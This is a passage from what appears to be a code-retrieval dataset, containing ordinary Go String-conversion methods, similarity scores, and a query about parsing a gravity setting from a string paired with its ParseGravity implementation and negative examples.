\"DDA\"\n\tcase DSB:\n\t\treturn \"DSB\"\n\tcase DFB:\n\t\treturn \"DFB\"\n\tcase DDB:\n\t\treturn \"DDB\"\n\tdefault:\n\t\treturn \"unknown data type\" // unreachable code\n\t}\n}", "func (me TSAFPTtextTypeMandatoryMax50Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (me TSAFPTtextTypeMandatoryMax254Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (o VolumeCompAggrAttributesType) String() string {\n\treturn ToString(reflect.ValueOf(o))\n}", "func (airspeed AirspeedSupersonic) ToString() string {\n\n\tif airspeed == 0 {\n\t\treturn \"no velocity information\"\n\t} else if airspeed >= 1023 {\n\t\treturn \">4086 kt\"\n\t} else {\n\t\treturn fmt.Sprintf(\"%v kt\", airspeed.GetAirspeed())\n\t}\n}", "func (d DBType) String() string {\n\tswitch d {\n\tcase DBNumber:\n\t\treturn \"Number\"\n\tcase DBText:\n\t\treturn \"Text\"\n\tcase DBDate:\n\t\treturn \"Date\"\n\tcase DBTime:\n\t\treturn \"Time\"\n\tcase DBBytes:\n\t\treturn \"Bytes\"\n\t}\n\n\treturn \"Unknown\"\n}", "func (me TSAFPTtextTypeMandatoryMax60Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (a APIType) String() string {\n\tswitch a {\n\tcase EGL:\n\t\treturn \"EGL\"\n\tcase GLES2:\n\t\treturn \"GLES2\"\n\tcase GLES3:\n\t\treturn \"GLES3\"\n\tcase GLES31:\n\t\treturn \"GLES31\"\n\tcase VK:\n\t\treturn \"VK\"\n\t}\n\treturn fmt.Sprintf(\"UNKNOWN (%d)\", a)\n}", "func (x *Float) String() string {}", "func (me TSAFmonetaryType) String() string { return xsdt.Decimal(me).String() }", "func (t Topology) String() string {\n\tswitch t {\n\tcase Linear:\n\t\treturn \"linear\"\n\tcase Circular:\n\t\treturn \"circular\"\n\tdefault:\n\t\treturn \"\"\n\t}\n}", "func (vt VolumeType) String() string {\n\treturn string(vt)\n}", "func (me TSAFPTtextTypeMandatoryMax172Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (geom Geometry) ToWKT() (string, error) {\n\tvar p *C.char\n\terr := C.OGR_G_ExportToWkt(geom.cval, &p).Err()\n\twkt := C.GoString(p)\n\tdefer C.free(unsafe.Pointer(p))\n\treturn wkt, err\n}", "func (me TSAFPTtextTypeMandatoryMax35Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (me TFontSizeValueType) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (me TSAFPTtextTypeMandatoryMax30Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (t Type) String() string {\n\tswitch t {\n\tdefault:\n\t\treturn \"Unknown\"\n\tcase Null:\n\t\treturn \"Null\"\n\tcase RESP:\n\t\treturn \"RESP\"\n\tcase Telnet:\n\t\treturn \"Telnet\"\n\tcase Native:\n\t\treturn \"Native\"\n\tcase HTTP:\n\t\treturn \"HTTP\"\n\tcase WebSocket:\n\t\treturn \"WebSocket\"\n\tcase JSON:\n\t\treturn \"JSON\"\n\t}\n}", "func (me TSAFPTtextTypeMax40Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (o GoogleCloudRetailV2alphaProductResponseOutput) Gtin() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GoogleCloudRetailV2alphaProductResponse) string { return v.Gtin }).(pulumi.StringOutput)\n}", "func (me TPreserveAspectRatioSpecType) String() string { return xsdt.String(me).String() }", "func (e EngineType) String() string {\n\tswitch e {\n\tcase EngineTiDB:\n\t\treturn \"EngineTiDB\"\n\tcase EngineTiKV:\n\t\treturn \"EngineTiKV\"\n\tcase EngineTiFlash:\n\t\treturn \"EngineTiFlash\"\n\t}\n\treturn \"UnknownEngineType\"\n}", "func (me TSAFPTtextTypeMandatoryMax255Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (t ObjectType) String() string {\n\treturn fromObjectType[t]\n}", "func (gdt *Vector3) AsString() String {\n\targ0 := gdt.getBase()\n\n\tret := C.go_godot_vector3_as_string(GDNative.api, arg0)\n\n\tutfStr := C.go_godot_string_utf8(GDNative.api, &ret)\n\tchar := C.go_godot_char_string_get_data(GDNative.api, &utfStr)\n\tgoStr := C.GoString(char)\n\tC.go_godot_char_string_destroy(GDNative.api, &utfStr)\n\n\treturn String(goStr)\n\n}", "func (ft *FieldType) String() string {\n\tstrs := []string{ft.CompactStr()}\n\tif mysql.HasUnsignedFlag(ft.flag) {\n\t\tstrs = append(strs, \"UNSIGNED\")\n\t}\n\tif mysql.HasZerofillFlag(ft.flag) {\n\t\tstrs = append(strs, \"ZEROFILL\")\n\t}\n\tif mysql.HasBinaryFlag(ft.flag) && ft.GetType() != mysql.TypeString {\n\t\tstrs = append(strs, \"BINARY\")\n\t}\n\n\tif IsTypeChar(ft.GetType()) || IsTypeBlob(ft.GetType()) {\n\t\tif ft.charset != \"\" && ft.charset != charset.CharsetBin {\n\t\t\tstrs = append(strs, fmt.Sprintf(\"CHARACTER SET %s\", ft.charset))\n\t\t}\n\t\tif ft.collate != \"\" && ft.collate != charset.CharsetBin {\n\t\t\tstrs = append(strs, fmt.Sprintf(\"COLLATE %s\", ft.collate))\n\t\t}\n\t}\n\n\treturn strings.Join(strs, \" \")\n}", "func (me TPreserveAspectRatioSpecType) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (t Type) String() string {\n\tif t >= 0 && int(t) < len(biomesNames) {\n\t\treturn string(biomesNames[t])\n\t}\n\treturn \"<invalid biome type>\"\n}", "func (g Grid) String() string {\n\tb := bytes.NewBuffer(nil)\n\tif _, err := g.WriteTo(b); err != nil {\n\t\treturn fmt.Sprintf(\"Error: %s\", err)\n\t}\n\treturn b.String()\n}", "func (me TFontSizeValueType) String() string { return xsdt.String(me).String() }", "func (me TSAFPTtextTypeMandatoryMax21Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (me TSAFPTtextTypeMandatoryMax200Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (me TSAFPTtextTypeMandatoryMax20Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (this *Variable) String() string {\n\ttyp := this.GetType()\n\tif types.IsList(typ) {\n\t\ttypes.ListToSingle(typ)\n\t}\n\tswitch typ {\n\tcase types.SINGLE_DOUBLE:\n\t\treturn \"$double\"\n\tcase types.SINGLE_INT:\n\t\treturn \"$int\"\n\tcase types.SINGLE_UINT:\n\t\treturn \"$uint\"\n\tcase types.SINGLE_BOOL:\n\t\treturn \"$bool\"\n\tcase types.SINGLE_STRING:\n\t\treturn \"$string\"\n\tcase types.SINGLE_BYTES:\n\t\treturn \"$[]byte\"\n\t}\n\tpanic(fmt.Errorf(\"unknown type %s\", this.GetType()))\n}", "func (x PackageType) String() string {\n\tif str, ok := _PackageTypeMap[x]; ok {\n\t\treturn str\n\t}\n\treturn fmt.Sprintf(\"PackageType(%d)\", x)\n}", "func (me TSAFPTtextTypeMandatoryMax90Car) String() string { return xsdt.String(me).String() }", "func (me TPaintType) String() string { return xsdt.String(me).String() }", "func RatFloatString(x *big.Rat, prec int) string", "func (rt RouterType) String() string {\n\tvar typeStr string\n\tswitch rt {\n\tcase LegacyT:\n\t\ttypeStr = \"Legacy\"\n\tcase AxT:\n\t\ttypeStr = \"AX\"\n\tcase OpenWrtT:\n\t\ttypeStr = \"OpenWrt\"\n\tcase UnknownT:\n\t\ttypeStr = \"Unknown\"\n\tdefault:\n\t\ttypeStr = string(rune(rt))\n\t}\n\treturn typeStr\n}", "func (t Type) String() string {\n\treturn string(t)\n}", "func (t Type) String() string {\n\treturn string(t)\n}", "func (me TSAFPTtextTypeMandatoryMax100Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (st StatType) String() string {\n\tswitch st {\n\tcase Avg:\n\t\treturn ElemAvg\n\tcase Max:\n\t\treturn ElemMax\n\tcase Min:\n\t\treturn ElemMin\n\t}\n\treturn \"unknown\"\n}", "func (h HazardType) String() string {\n\tjh, _ := json.Marshal(h)\n\treturn string(jh)\n}", "func (tvs TvSystem) String() string {\n\tif tvs == NtscTv {\n\t\treturn \"NTSC\"\n\t} else if tvs == PalTv {\n\t\treturn \"PAL\"\n\t}\n\treturn \"DualCompatible\"\n}", "func (t TileType) String() string {\n\tswitch t {\n\tcase Wall:\n\t\treturn \"Wall\"\n\n\tcase Road:\n\t\treturn \"Road\"\n\n\tcase Exit:\n\t\treturn \"Exit\"\n\n\tcase Duplicate:\n\t\treturn \"Duplicate\"\n\n\tdefault:\n\t\treturn \"error,wrong input\"\n\t}\n}", "func (b *Bound) String() string {\n\t// west, south, west, north, east, north, east, south, west, south\n\treturn fmt.Sprintf(\"POLYGON((%g %g, %g %g, %g %g, %g %g, %g %g))\", b.sw[0], b.sw[1], b.sw[0], b.ne[1], b.ne[0], b.ne[1], b.ne[0], b.sw[1], b.sw[0], b.sw[1])\n}", "func (f *Format) String() string {\n\tswitch *f {\n\tcase EOT:\n\t\treturn \"eot\"\n\tcase WOFF:\n\t\treturn \"woff\"\n\tcase TTF:\n\t\treturn \"ttf\"\n\tcase ODT:\n\t\treturn \"odt\"\n\t}\n\treturn \"\"\n}", "func VMTypeToStringPanic(tag vm_grpc.VMTypeTag) string {\n\tif val, ok := vm_grpc.VMTypeTag_name[int32(tag)]; !ok {\n\t\tpanic(fmt.Errorf(\"can't find string representation of type %d, check correctness of type value\", tag))\n\t} else {\n\t\treturn val\n\t}\n}", "func stringOfBigFloat(n *big.Float) string {\n\treturn n.Text('g', -1)\n}", "func (me TPaintType) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (gt GrantType) String() string {\n\tswitch gt {\n\tcase GrantTypeAuthorizationCode:\n\t\treturn string(grantTypeAuthorizationCodeJSON[1:19])\n\tcase GrantTypeRefreshToken:\n\t\treturn string(grantTypeRefreshTokenJSON[1:14])\n\tdefault:\n\t\treturn \"\"\n\t}\n}", "func (me TSAFPTtextTypeMandatoryMax10Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (m MarkerType) String() string {\n\treturn string(m)\n}", "func (m MarkerType) String() string {\n\treturn string(m)\n}", "func (me TSAFPTtextTypeMandatoryMax70Car) String() string { return xsdt.String(me).String() }", "func (m *CirconusMetrics) gaugeValString(val interface{}) string {\n\tvs := \"\"\n\tswitch v := val.(type) {\n\tdefault:\n\t\t// ignore it, unsupported type\n\tcase int:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase int8:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase int16:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase int32:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase int64:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase uint:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase uint8:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase uint16:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase uint32:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase uint64:\n\t\tvs = fmt.Sprintf(\"%d\", v)\n\tcase float32:\n\t\tvs = fmt.Sprintf(\"%f\", v)\n\tcase float64:\n\t\tvs = fmt.Sprintf(\"%f\", v)\n\t}\n\treturn vs\n}", "func (ct ConstraintType) String() string {\n\tswitch ct {\n\tcase CheckConstraint:\n\t\treturn \"CheckConstraint\"\n\tcase NotNullConstraint:\n\t\treturn \"NotNullConstraint\"\n\tcase UniqueConstraint:\n\t\treturn \"UniqueConstraint\"\n\tcase PrimaryKeyConstraint:\n\t\treturn \"PrimaryKeyConstraint\"\n\tcase ForeignKeyConstraint:\n\t\treturn \"ForeignKeyConstraint\"\n\tdefault:\n\t\treturn \"\"\n\t}\n}", "func (me TSAFPTtextTypeMandatoryMax210Car) String() string { return xsdt.String(me).String() }", "func (wt WordType) String() string {\n\treturn wordTypeMap[wt]\n}", "func getMetricTypeAsString(metric telegraf.Metric) (metricType string, err error) {\n\tswitch metric.Type() {\n\tcase telegraf.Counter:\n\t\tmetricType = \"counter\"\n\tcase telegraf.Gauge:\n\t\tmetricType = \"gauge\"\n\tcase telegraf.Summary:\n\t\tmetricType = \"summary\"\n\t\terr = fmt.Errorf(\"summary metrics will be sent as gauges\")\n\tcase telegraf.Histogram:\n\t\tmetricType = \"histogram\"\n\t\terr = fmt.Errorf(\"histogram metrics will be sent as gauges\")\n\tcase telegraf.Untyped:\n\t\tmetricType = \"untyped\"\n\t\terr = fmt.Errorf(\"untyped metrics will be sent as gauges\")\n\tdefault:\n\t\tmetricType = \"unrecognized\"\n\t\terr = fmt.Errorf(\"unrecognized metric type defaulting to gauge\")\n\t}\n\treturn metricType, err\n}", "func FloatToString(f float64) string {\n\treturn strconv.FormatFloat(float64(f), 'g', -1, 64)\n}", "func (me TFontSizeAdjustValueType) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (m mapType) String() string {\n\tswitch m {\n\tcase mapTypeIPv4TCPLocal:\n\t\treturn \"Local IPv4 TCP CT map\"\n\tcase mapTypeIPv6TCPLocal:\n\t\treturn \"Local IPv6 TCP CT map\"\n\tcase mapTypeIPv4TCPGlobal:\n\t\treturn \"Global IPv4 TCP CT map\"\n\tcase mapTypeIPv6TCPGlobal:\n\t\treturn \"Global IPv6 TCP CT map\"\n\tcase mapTypeIPv4AnyLocal:\n\t\treturn \"Local IPv4 non-TCP CT map\"\n\tcase mapTypeIPv6AnyLocal:\n\t\treturn \"Local IPv6 non-TCP CT map\"\n\tcase mapTypeIPv4AnyGlobal:\n\t\treturn \"Global IPv4 non-TCP CT map\"\n\tcase mapTypeIPv6AnyGlobal:\n\t\treturn \"Global IPv6 non-TCP CT map\"\n\t}\n\treturn fmt.Sprintf(\"Unknown (%d)\", int(m))\n}", "func (m mapType) String() string {\n\tswitch m {\n\tcase mapTypeIPv4TCPLocal:\n\t\treturn \"Local IPv4 TCP CT map\"\n\tcase mapTypeIPv6TCPLocal:\n\t\treturn \"Local IPv6 TCP CT map\"\n\tcase mapTypeIPv4TCPGlobal:\n\t\treturn \"Global IPv4 TCP CT map\"\n\tcase mapTypeIPv6TCPGlobal:\n\t\treturn \"Global IPv6 TCP CT map\"\n\tcase mapTypeIPv4AnyLocal:\n\t\treturn \"Local IPv4 non-TCP CT map\"\n\tcase mapTypeIPv6AnyLocal:\n\t\treturn \"Local IPv6 non-TCP CT map\"\n\tcase mapTypeIPv4AnyGlobal:\n\t\treturn \"Global IPv4 non-TCP CT map\"\n\tcase mapTypeIPv6AnyGlobal:\n\t\treturn \"Global IPv6 non-TCP CT map\"\n\t}\n\treturn fmt.Sprintf(\"Unknown (%d)\", int(m))\n}", "func (me TSAFPTtextTypeMandatoryMax60Car) String() string { return xsdt.String(me).String() }", "func (h HotRegionType) String() string {\n\tswitch h {\n\tcase WriteType:\n\t\treturn \"write\"\n\tcase ReadType:\n\t\treturn \"read\"\n\t}\n\treturn \"unimplemented\"\n}", "func (x EnvironmentType) String() string {\n\tif str, ok := _EnvironmentTypeMap[x]; ok {\n\t\treturn str\n\t}\n\treturn fmt.Sprintf(\"EnvironmentType(%d)\", x)\n}", "func (b Bet) String() string {\n\tif b.Amount != 0. {\n\t\treturn fmt.Sprintf(\"%s %.2f\", string(b.Type), b.Amount)\n\t}\n\treturn string(b.Type)\n}", "func (geom Geometry) ToGML_Ex(options []string) string {\n\tlength := len(options)\n\topts := make([]*C.char, length+1)\n\tfor i := 0; i < length; i++ {\n\t\topts[i] = C.CString(options[i])\n\t\tdefer C.free(unsafe.Pointer(opts[i]))\n\t}\n\topts[length] = (*C.char)(unsafe.Pointer(nil))\n\n\tval := C.OGR_G_ExportToGMLEx(geom.cval, (**C.char)(unsafe.Pointer(&opts[0])))\n\treturn C.GoString(val)\n}", "func (me TGlyphOrientationHorizontalValueType) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (s *Send) Golang() string {\n\tvar buf bytes.Buffer\n\tswitch len(s.Vals) {\n\tcase 0:\n\t\tbuf.WriteString(fmt.Sprintf(\"%s <- struct{}{};\", s.Chan.Name()))\n\tcase 1:\n\t\tbuf.WriteString(fmt.Sprintf(\"%s <- %s;\", s.Chan.Name(), s.Vals[0].Name()))\n\tdefault:\n\t\tbuf.WriteString(fmt.Sprintf(\"%s <- struct {\", s.Chan.Name()))\n\t\tfor i := 0; i < len(s.Vals); i++ {\n\t\t\tif i != 0 {\n\t\t\t\tbuf.WriteRune(';')\n\t\t\t}\n\t\t\tbuf.WriteString(fmt.Sprintf(\"e%d %s\", i, s.Vals[i].Type()))\n\t\t}\n\t\tbuf.WriteString(fmt.Sprintf(\"}{\"))\n\t\tfor i, v := range s.Vals {\n\t\t\tif i != 0 {\n\t\t\t\tbuf.WriteRune(',')\n\t\t\t}\n\t\t\tbuf.WriteString(v.Name())\n\t\t}\n\t\tbuf.WriteString(fmt.Sprintf(\"}\"))\n\n\t}\n\treturn buf.String()\n}" ]
[ "0.5575802", "0.5499247", "0.5484856", "0.5476465", "0.54468846", "0.54457223", "0.54219407", "0.5417401", "0.541277", "0.5407705", "0.53995806", "0.53897923", "0.5382045", "0.536176", "0.5355089", "0.53541756", "0.5338253", "0.53325325", "0.53228474", "0.53225034", "0.5310002", "0.52692646", "0.5265296", "0.5265283", "0.5254271", "0.5243691", "0.5236827", "0.5228219", "0.52119416", "0.5203864", "0.5202512", "0.51991236", "0.5198446", "0.51971865", "0.5194243", "0.5190309", "0.51832664", "0.51827544", "0.5180472", "0.5179268", "0.5170563", "0.5167349", "0.5163913", "0.516258", "0.5158568", "0.5153482", "0.51480484", "0.51457125", "0.5144618", "0.5143191", "0.51420254", "0.51388913", "0.5132329", "0.51305914", "0.51267755", "0.51267034", "0.51168764", "0.5111769", "0.5107575", "0.5107401", "0.51061773", "0.50933564", "0.50821745", "0.50785947", "0.50720453", "0.50652695", "0.5048492", "0.5040324", "0.5040324", "0.50393045", "0.5038266", "0.50353485", "0.50332063", "0.5032469", "0.5026474", "0.5026064", "0.501948", "0.50179553", "0.50139415", "0.5011526", "0.5010123", "0.50013995", "0.50013995", "0.50011754", "0.49969712", "0.49924552", "0.4992344", "0.49920616", "0.4989155", "0.49756646", "0.49745506", "0.4973887", "0.4973887", "0.49714833", "0.49681655", "0.4968092", "0.49664876", "0.4958654", "0.49584317", "0.49535233" ]
0.7351317
0
Function to parse a string into a gravity type. If value is not a valid gravity, the function returns an error. If the value is an empty string, the default gravity 'def' is used instead
func ParseGravity(value string, def Gravity) (Gravity, error) { // Convert the string to lowercase value = strings.ToLower(value) // If the value isn't given, use the default if value == "" { return def, nil } // Try to get the gravity type from the map gravity, ok := GravityTypes[value] if ok { return gravity, nil } else { return Gravity{}, errors.New("invalid gravity '" + value + "'") } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ParseStringToStorageClassType(value string) (ret StorageClassType) {\n\tswitch value {\n\tcase \"STANDARD\":\n\t\tret = StorageClassStandard\n\tcase \"STANDARD_IA\", \"WARM\":\n\t\tret = StorageClassWarm\n\tcase \"GLACIER\", \"COLD\":\n\t\tret = StorageClassCold\n\tdefault:\n\t\tret = \"\"\n\t}\n\treturn\n}", "func parseStorageClass(in storageclass.Type) (string, error) {\n\tswitch in {\n\tcase storageclass.Hot:\n\t\treturn s3.ObjectStorageClassStandard, nil\n\tcase storageclass.Warm:\n\t\treturn s3.ObjectStorageClassStandardIa, nil\n\tcase storageclass.Cold:\n\t\treturn s3.ObjectStorageClassGlacier, nil\n\tdefault:\n\t\treturn \"\", types.ErrStorageClassNotSupported\n\t}\n}", "func UsageTypeEnumFromValue(value string) UsageTypeEnum {\r\n switch value {\r\n case \"kArchival\":\r\n return UsageType_KARCHIVAL\r\n case \"kCloudSpill\":\r\n return UsageType_KCLOUDSPILL\r\n default:\r\n return UsageType_KARCHIVAL\r\n }\r\n}", "func (g *Gravity) String() string {\n\t// Iterate over the gravity types\n\tfor name, gravity := range GravityTypes {\n\t\t// If the horizontal and vertical gravity is a match\n\t\tif g.HorizGravity == gravity.HorizGravity &&\n\t\t\tg.VertGravity == gravity.VertGravity {\n\t\t\treturn name\n\t\t}\n\t}\n\t// Otherwise return an empty string\n\treturn \"\"\n}", "func StorageTypeFromString(in string) StorageType {\n\tin = strings.ToLower(in)\n\tin = strings.TrimSpace(in)\n\n\tswitch in {\n\tcase \"\":\n\t\treturn StorageBolt\n\tcase \"memory\":\n\t\treturn StorageMemory\n\tcase \"bolt\":\n\t\treturn StorageBolt\n\tcase \"mysql\":\n\t\treturn StorageMysql\n\tcase \"filesystem\":\n\t\treturn StorageFilesystem\n\t}\n\n\treturn StorageInvalid\n}", "func Parse(s string) (interface{}, error) {\n\tsentence := Sentence{}\n\tif err := sentence.Parse(s); err != nil {\n\t\treturn nil, err\n\t}\n\tif sentence.SType == PrefixGPGGA {\n\t\tgpgga := GPGGA{}\n\t\tif err := gpgga.Parse(s); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn gpgga, nil\n\t}\n\tif sentence.SType == PrefixGPGSA {\n\t\tgpgsa := GPGSA{}\n\t\tif err := gpgsa.Parse(s); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn gpgsa, nil\n\t}\n\tif sentence.SType == PrefixGPRMC {\n\t\tgprmc := GPRMC{}\n\t\tif err := gprmc.Parse(s); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn gprmc, nil\n\t}\n\tif sentence.SType == PrefixGPVTG {\n\t\tgpvtg := GPVTG{}\n\t\tif err := gpvtg.Parse(s); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn gpvtg, nil\n\t}\n\tif sentence.SType == PrefixPSRFTXT {\n\t\tpsrf := PSRFTXT{}\n\t\tif err := psrf.Parse(s); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn psrf, nil\n\t}\n\treturn sentence, nil\n}", "func PkgTypeEnumFromValue(value string) PkgTypeEnum {\r\n switch value {\r\n case \"kScript\":\r\n return PkgType_KSCRIPT\r\n case \"kRPM\":\r\n return PkgType_KRPM\r\n case \"kSuseRPM\":\r\n return PkgType_KSUSERPM\r\n case \"kDEB\":\r\n return PkgType_KDEB\r\n default:\r\n return PkgType_KSCRIPT\r\n }\r\n}", "func TypeFromStr(ct string) (Type, error) {\n\tswitch ct {\n\tcase \"bitcoin\":\n\t\treturn Bitcoin, nil\n\tcase \"skycoin\":\n\t\treturn Skycoin, nil\n\tdefault:\n\t\treturn -1, fmt.Errorf(\"unknow coin type:%s\", ct)\n\t}\n}", "func formatStorageClass(in string) (storageclass.Type, error) {\n\tswitch in {\n\tcase s3.ObjectStorageClassStandard:\n\t\treturn storageclass.Hot, nil\n\tcase s3.ObjectStorageClassStandardIa:\n\t\treturn storageclass.Warm, nil\n\tcase s3.ObjectStorageClassGlacier:\n\t\treturn storageclass.Cold, nil\n\tdefault:\n\t\treturn \"\", types.ErrStorageClassNotSupported\n\t}\n\n}", "func TranslateStringToType(tagType TagTypePrimitive, valueString string) (value interface{}, err error) {\n\tdefer func() {\n\t\tif state := recover(); state != nil {\n\t\t\terr = log.Wrap(state.(error))\n\t\t}\n\t}()\n\n\tif tagType == TypeUndefined {\n\t\t// The caller should just call String() on the decoded type.\n\t\tlog.Panicf(\"undefined-type values are not supported\")\n\t}\n\n\tif tagType == TypeByte {\n\t\twide, err := strconv.ParseInt(valueString, 16, 8)\n\t\tlog.PanicIf(err)\n\n\t\treturn byte(wide), nil\n\t} else if tagType == TypeAscii || tagType == TypeAsciiNoNul {\n\t\t// Whether or not we're putting an NUL on the end is only relevant for\n\t\t// byte-level encoding. This function really just supports a user\n\t\t// interface.\n\n\t\treturn valueString, nil\n\t} else if tagType == TypeShort {\n\t\tn, err := strconv.ParseUint(valueString, 10, 16)\n\t\tlog.PanicIf(err)\n\n\t\treturn uint16(n), nil\n\t} else if tagType == TypeLong {\n\t\tn, err := strconv.ParseUint(valueString, 10, 32)\n\t\tlog.PanicIf(err)\n\n\t\treturn uint32(n), nil\n\t} else if tagType == TypeRational {\n\t\tparts := strings.SplitN(valueString, \"/\", 2)\n\n\t\tnumerator, err := strconv.ParseUint(parts[0], 10, 32)\n\t\tlog.PanicIf(err)\n\n\t\tdenominator, err := strconv.ParseUint(parts[1], 10, 32)\n\t\tlog.PanicIf(err)\n\n\t\treturn Rational{\n\t\t\tNumerator: uint32(numerator),\n\t\t\tDenominator: uint32(denominator),\n\t\t}, nil\n\t} else if tagType == TypeSignedLong {\n\t\tn, err := strconv.ParseInt(valueString, 10, 32)\n\t\tlog.PanicIf(err)\n\n\t\treturn int32(n), nil\n\t} else if tagType == TypeFloat {\n\t\tn, err := strconv.ParseFloat(valueString, 32)\n\t\tlog.PanicIf(err)\n\n\t\treturn float32(n), nil\n\t} else if tagType == TypeDouble {\n\t\tn, err := strconv.ParseFloat(valueString, 64)\n\t\tlog.PanicIf(err)\n\n\t\treturn float64(n), nil\n\t} else if tagType == TypeSignedRational {\n\t\tparts := strings.SplitN(valueString, \"/\", 2)\n\n\t\tnumerator, err := strconv.ParseInt(parts[0], 10, 32)\n\t\tlog.PanicIf(err)\n\n\t\tdenominator, err := strconv.ParseInt(parts[1], 10, 32)\n\t\tlog.PanicIf(err)\n\n\t\treturn SignedRational{\n\t\t\tNumerator: int32(numerator),\n\t\t\tDenominator: int32(denominator),\n\t\t}, nil\n\t}\n\n\tlog.Panicf(\"from-string encoding for type not supported; this shouldn't happen: [%s]\", tagType.String())\n\treturn nil, nil\n}", "func TypeString(s string) (Type, error) {\n\tif val, ok := _TypeNameToValueMap[s]; ok {\n\t\treturn val, nil\n\t}\n\ts = strings.ToLower(s)\n\tif val, ok := _TypeNameToValueMap[s]; ok {\n\t\treturn val, nil\n\t}\n\treturn 0, fmt.Errorf(\"%s does not belong to Type values\", s)\n}", "func (me TxsdMovementType) IsGt() bool { return me.String() == \"GT\" }", "func parseTyped(value_str string) interface{} {\n\tvalueInt, err := strconv.ParseInt(strings.TrimSpace(value_str), 10, 64)\n\tif err == nil {\n\t\treturn valueInt\n\t}\n\tvalueFloat, err := strconv.ParseFloat(value_str, 64)\n\tif err == nil {\n\t\treturn valueFloat\n\t}\n\treturn value_str\n}", "func parseGPUType(annotations map[string]string) string {\n\tif val, found := annotations[gpuTypeKey]; found {\n\t\treturn val\n\t}\n\treturn \"\"\n}", "func (vl StringValue) GetType() int {\n\treturn ParticleType.STRING\n}", "func (vl StringValue) GetType() int {\n\treturn ParticleType.STRING\n}", "func (me TxsdMovementType) IsGd() bool { return me.String() == \"GD\" }", "func (t FieldType) Parse(value string) (interface{}, error) {\n\tswitch t {\n\tcase STRING, PICKLIST, MULTIPICKLIST, COMBOBOX, REFERENCE, BASE64, TEXTAREA, PHONE, ID, URL, EMAIL, ENCRYPTEDSTRING, DATACATEGORYGROUPREFERENCE:\n\t\treturn conv.STRING.Parse(value)\n\tcase BOOLEAN:\n\t\treturn conv.BOOLEAN.Parse(value)\n\tcase CURRENCY, INT, DOUBLE, PERCENT:\n\t\treturn conv.NUMBER.Parse(value)\n\tcase DATE:\n\t\treturn conv.DATE.Parse(value)\n\tcase TIME:\n\t\treturn conv.TIME.Parse(value)\n\tcase DATETIME:\n\t\treturn conv.DATETIME.Parse(value)\n\tcase LOCATION, ADDRESS, ANYTYPE:\n\t\treturn nil, errors.New(fmt.Sprint(\"unsupported type\"))\n\t}\n\treturn nil, errors.New(fmt.Sprint(\"unknown type\"))\n}", "func ParseGenPluginType(s string) (GenPluginType, error) {\n\tgenPluginType, ok := _stringToGenPluginType[strings.ToLower(s)]\n\tif !ok {\n\t\treturn GenPluginTypeNone, fmt.Errorf(\"could not parse %s to a GenPluginType\", s)\n\t}\n\treturn genPluginType, nil\n}", "func ParseAndRequireString(\n\tt *types.T, s string, ctx ParseTimeContext,\n) (d Datum, dependsOnContext bool, err error) {\n\tswitch t.Family() {\n\tcase types.ArrayFamily:\n\t\td, dependsOnContext, err = ParseDArrayFromString(ctx, s, t.ArrayContents())\n\tcase types.BitFamily:\n\t\td, err = ParseDBitArray(s)\n\tcase types.BoolFamily:\n\t\td, err = ParseDBool(s)\n\tcase types.BytesFamily:\n\t\td, err = ParseDByte(s)\n\tcase types.DateFamily:\n\t\td, dependsOnContext, err = ParseDDate(ctx, s)\n\tcase types.DecimalFamily:\n\t\td, err = ParseDDecimal(s)\n\tcase types.FloatFamily:\n\t\td, err = ParseDFloat(s)\n\tcase types.INetFamily:\n\t\td, err = ParseDIPAddrFromINetString(s)\n\tcase types.IntFamily:\n\t\td, err = ParseDInt(s)\n\tcase types.IntervalFamily:\n\t\titm, typErr := t.IntervalTypeMetadata()\n\t\tif typErr != nil {\n\t\t\treturn nil, false, typErr\n\t\t}\n\t\td, err = ParseDIntervalWithTypeMetadata(s, itm)\n\tcase types.GeographyFamily:\n\t\td, err = ParseDGeography(s)\n\tcase types.GeometryFamily:\n\t\td, err = ParseDGeometry(s)\n\tcase types.JsonFamily:\n\t\td, err = ParseDJSON(s)\n\tcase types.OidFamily:\n\t\ti, err := ParseDInt(s)\n\t\tif err != nil {\n\t\t\treturn nil, false, err\n\t\t}\n\t\td = NewDOid(*i)\n\tcase types.StringFamily:\n\t\t// If the string type specifies a limit we truncate to that limit:\n\t\t// 'hello'::CHAR(2) -> 'he'\n\t\t// This is true of all the string type variants.\n\t\tif t.Width() > 0 {\n\t\t\ts = utils.TruncateString(s, int(t.Width()))\n\t\t}\n\t\treturn NewDString(s), false, nil\n\tcase types.TimeFamily:\n\t\td, dependsOnContext, err = ParseDTime(ctx, s, TimeFamilyPrecisionToRoundDuration(t.Precision()))\n\tcase types.TimeTZFamily:\n\t\td, 